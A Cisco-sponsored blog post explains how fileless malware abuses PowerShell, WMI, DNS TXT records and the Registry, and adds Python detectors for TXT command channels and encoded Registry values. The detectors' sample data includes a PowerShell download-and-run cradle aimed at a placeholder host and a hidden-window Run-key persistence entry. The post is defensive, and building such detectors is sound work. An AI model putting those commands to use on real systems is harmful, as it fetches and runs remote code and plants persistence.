In Pursuit of Invisibility: Fileless Malware

October 2, 2018


This blog is sponsored by Cisco and was originally posted on their blog by:
Marc Blackmer
September 13, 2018

I recently heard a news story about a survey in which people were asked whether they would prefer to have the ability to fly or to be invisible. Sure, it was a silly question*, but it was interesting to hear why people made their choices. The majority chose flight. What really fascinated me was that the survey’s authors believed that most people would actually have preferred to be invisible, but chose flying because they associated invisibility with unethical and criminal behavior.

That association, of course, got me thinking about security. Being invisible is what cybercriminals strive to be, and the development of fileless malware helps them get pretty close.

Fileless malware is a type of memory-resident malware. As the term suggests, it operates from a victim system’s memory rather than from files on disk. That makes it harder to detect, because there is no malicious executable for a file scanner to examine, and harder to investigate, because the in-memory payload is gone once the victim computer is rebooted. The persistence hooks an attacker leaves behind, such as a Registry value or a WMI subscription that relaunches the payload, can survive the reboot, so those are the places forensics has to look.

Fileless malware can find its way into a network through phishing, malicious websites, etc., just as any other kind of malware would. The difference is that no malicious executable is written to disk or run at the time of infection. That’s the fileless part. The malware then runs in system memory and manipulates administrative utilities like Windows PowerShell and Windows Management Instrumentation (WMI) to do its work. Because many security technologies explicitly trust these utilities, the malware stays under the radar and its activities appear benign.

Our Cisco Talos threat intelligence team blogged about a creative example of fileless malware they called DNSMessenger in 2017. (You can read their full blog post on DNSMessenger here.) The attackers emailed their victims a malicious Word document and enticed them to enable macros. Once enabled, a macro launched a Windows PowerShell script that used WMI for persistence and queried specific attacker-controlled Internet domains. The malware received further instructions from the DNS TXT records associated with those domains.

Traditional file-centric malware detection technologies would not have detected this threat, because no malicious binary was ever written to disk and the malicious instructions were cleverly placed in DNS records external to the victims’ networks. Everything would have looked normal from a file-based perspective; only close monitoring of DNS traffic, for instance for a single host issuing a stream of TXT queries to ever-changing names under one domain, would have revealed it.
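To make that DNS monitoring concrete, here is an added example (not code from the original post or from Talos) that runs over a constructed DNS query log. The log format, the client addresses, the domains and the thresholds are all assumptions. The idea: legitimate TXT lookups (SPF, DMARC) repeat the same few names, whereas a TXT-based command channel encodes data in the leading label, so the names never repeat and the labels look like random or encoded text. The detector therefore flags a client/domain pair when it sees many distinct leading labels whose average Shannon entropy is high.

```python
import math
from collections import defaultdict

# Constructed sample DNS query log; not taken from the original post or from Talos.
# Assumed format: "<timestamp> <client-ip> <qtype> <qname>", one query per line.
SAMPLE_DNS_LOG = """\
2018-09-13T10:00:01 10.1.2.34 A www.example.com
2018-09-13T10:00:02 10.1.2.34 TXT _dmarc.example.com
2018-09-13T10:00:05 10.1.2.34 TXT aGVsbG8gd29ybGQ.update-svc.example.net
2018-09-13T10:00:09 10.1.2.34 TXT c3RhZ2UyX3BheWxvYWQ.update-svc.example.net
2018-09-13T10:00:13 10.1.2.34 TXT d2hvYW1pIC9hbGw.update-svc.example.net
2018-09-13T10:00:17 10.1.2.34 TXT bmV0IHVzZXIgYWRt.update-svc.example.net
2018-09-13T10:00:21 10.1.2.34 TXT 6aLpfwSz3Qn8RbXe.update-svc.example.net
2018-09-13T10:00:25 10.1.2.34 TXT Zm9ybWF0IGMgL3Ev.update-svc.example.net
2018-09-13T10:00:30 10.1.2.35 A mail.example.com
2018-09-13T10:00:31 10.1.2.35 TXT example.com
2018-09-13T10:00:32 10.1.2.35 TXT _dmarc.example.com
"""

MIN_DISTINCT_LABELS = 5   # SPF/DMARC lookups repeat a few fixed names; a data channel never repeats
MIN_MEAN_ENTROPY = 2.5    # bits per character of the leading label; encoded data scores higher


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_dns_log(text):
    """Yield (client, qtype, qname) tuples from the assumed log format, skipping bad lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, client, qtype, qname = parts
        yield client, qtype.upper(), qname.rstrip(".")


def split_qname(qname):
    """Return (leading_label, parent_domain); parent is the last two labels.
    A real deployment should use the Public Suffix List instead of 'last two labels'.
    Names with fewer than three labels carry no data label and return None for it."""
    labels = qname.split(".")
    if len(labels) < 3:
        return None, qname.lower()
    return labels[0], ".".join(labels[-2:]).lower()


def find_txt_channels(log_text, min_labels=MIN_DISTINCT_LABELS, min_entropy=MIN_MEAN_ENTROPY):
    """Return {(client, parent_domain): {"labels": n, "mean_entropy": bits}} for every
    client/domain pair whose TXT queries look like an encoded command channel."""
    seen = defaultdict(set)
    for client, qtype, qname in parse_dns_log(log_text):
        if qtype != "TXT":
            continue
        leading, parent = split_qname(qname)
        if leading is None:
            continue
        seen[(client, parent)].add(leading)
    findings = {}
    for key, labels in seen.items():
        if len(labels) < min_labels:
            continue
        mean_entropy = sum(shannon_entropy(l) for l in labels) / len(labels)
        if mean_entropy >= min_entropy:
            findings[key] = {"labels": len(labels), "mean_entropy": round(mean_entropy, 2)}
    return findings


if __name__ == "__main__":
    for (client, domain), info in find_txt_channels(SAMPLE_DNS_LOG).items():
        print(f"{client} -> {domain}: {info['labels']} distinct TXT labels, "
              f"mean label entropy {info['mean_entropy']} bits/char")
```

Run against the sample, only the 10.1.2.34 / example.net pair is reported; the two _dmarc lookups and the bare example.com TXT query fall under the distinct-label floor. Tuning note: the entropy floor is a blunt tool (short DMARC or DKIM selector labels can score above it), which is why the distinct-label count is the primary condition.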

Another technique used by fileless malware authors is to store encoded commands in one or more Windows Registry values. The Registry is not an area where security products have traditionally looked for malware; it’s trusted. So when a PowerShell script reads a Registry value, that activity doesn’t appear out of the ordinary. What is out of the ordinary is the content: legitimate Registry values are rarely long base64 blobs, and a Run key that launches powershell.exe with an encoded command is a strong indicator. Again, file-based malware detection would miss such a threat; endpoint protection that inspects Registry contents for obfuscated commands is needed.
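As an added example of that Registry inspection (not code from the original post, and not from any real sample), the following parses a constructed .reg export and flags two things: a string value that invokes powershell.exe with an -EncodedCommand argument, and a value whose data is nothing but base64 that decodes to readable UTF-16LE text, which is how a stored PowerShell stage looks. The key paths, value names and commands are all made up; the encoded blobs are generated at load time with the same UTF-16LE-then-base64 encoding that -EncodedCommand expects, so the detector has to genuinely decode them.

```python
import base64
import binascii
import re


def ps_encode(command):
    """Encode a command the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample commands and Registry export; none of this comes from the original
# post or from a real malware sample. The download URL uses the reserved .invalid TLD.
STAGE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
STORED_CMD = "$p = Get-ItemProperty HKCU:\\Software\\Classes\\ExampleKey; IEX $p.Payload"
NOT_UTF16 = base64.b64encode(b"this is ordinary base64 of ASCII text and must not be flagged").decode("ascii")

SAMPLE_REG_EXPORT = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"',
    '"Updater"="powershell.exe -NoP -W Hidden -Enc ' + ps_encode(STAGE_CMD) + '"',
    "",
    r"[HKEY_CURRENT_USER\Software\Classes\ExampleKey]",
    '"Payload"="' + ps_encode(STORED_CMD) + '"',
    '"Description"="Example application settings"',
    '"Token"="' + NOT_UTF16 + '"',
])

# A .reg string value line: "Name"="data", with \" and \\ escapes inside the quotes.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# Look-alikes such as "-ExecutionPolicy Bypass" are rejected by the decode step below.
ENC_FLAG_RE = re.compile(r'\s-e[a-z]{0,13}\s+([A-Za-z0-9+/=]{16,})', re.IGNORECASE)
# A value whose entire data is one long base64 string.
BASE64_RE = re.compile(r'^[A-Za-z0-9+/]{32,}={0,2}$')


def parse_reg_export(text):
    """Yield (key, value_name, data) for the quoted string values in a .reg export.
    hex:/dword: values are skipped; string values are what Run keys and stored scripts use."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            m = VALUE_RE.match(line)
            if m:
                data = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
                yield key, m.group(1), data


def decode_utf16_base64(blob):
    """Return the text if blob is base64 of printable, mostly ASCII UTF-16LE text, else None.
    The ASCII check matters: base64 of plain ASCII bytes decodes to printable CJK gibberish."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    if sum(ord(ch) < 128 for ch in text) / len(text) < 0.9:
        return None
    return text


def scan_registry(text):
    """Return [(key, value_name, reason, decoded_command)] for suspicious string values."""
    findings = []
    for key, name, data in parse_reg_export(text):
        m = ENC_FLAG_RE.search(data)
        if m:
            decoded = decode_utf16_base64(m.group(1))
            if decoded is not None:
                findings.append((key, name, "powershell -EncodedCommand in value data", decoded))
                continue
        if BASE64_RE.match(data):
            decoded = decode_utf16_base64(data)
            if decoded is not None:
                findings.append((key, name, "base64 UTF-16LE text stored as value data", decoded))
    return findings


if __name__ == "__main__":
    for key, name, reason, decoded in scan_registry(SAMPLE_REG_EXPORT):
        print(f"[{key}] {name}: {reason}\n    decodes to: {decoded}")
```

On the sample this reports the Updater run value and the stored Payload value, with both commands decoded, while the OneDrive entry, the plain description and the ordinary base64 token are left alone. Decoding rather than pattern-matching on "powershell" is the point: the decoded text is what an analyst needs, and it is what a real detection should hand to the next stage (for instance, a check for download cradles or for a second Registry read like the one in the stored command).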

These are just a couple of examples of how far attackers have come in exploiting trusted processes and in taking advantage of the gaps between isolated security technologies.

Attackers won’t just try one attack vector and give up if that doesn’t work. They’ll jiggle every door knob, check every window, and see what can fit under the door in order to gain a foothold in your network. And those gaps in protection help them do just that. So logically, one security technology will not defend against all variations of these attacks. Phishing attacks need to be blocked. Malicious attachments need to be stripped from emails. Traffic to bad domains needs to be stopped. Network traffic needs to be monitored for anomalies inside and outside of the data center to the endpoints. And when a threat is detected through one attack vector, that intelligence needs to be shared across all defensive technologies, preferably through automated means.

The good thing is, we do all of these things and more. First, we have developed indicators of compromise for fileless malware, such as unusual content in DNS requests or unusual Windows Registry value content that could be used to obfuscate malicious commands.

Next, consider that we gather telemetry from hundreds of billions of emails, over 100 billion DNS requests, and analyze close to 2 million malware samples every day. We conduct research using thousands of honeypots, through reverse engineering malware, and conducting vulnerability research. Because our research encompasses network, endpoint, web, cloud, email, and files, we see more and can detect more. All of the output from our research ends up in the content of our entire security product portfolio that protects you.

If you’d like to learn more about fileless malware, be sure to read the Talos blog post linked above and their follow-up post available here. Both posts include a list at the end of the ways we help mitigate the threat of fileless malware. And as always, we’d love to share our technology with you through an instant online demo or a personalized demo with one of our security experts.

* Me? I’d choose flight. No, really.

1 Comment
  1. Wow. That’s a fascinating article. I too would choose flight.
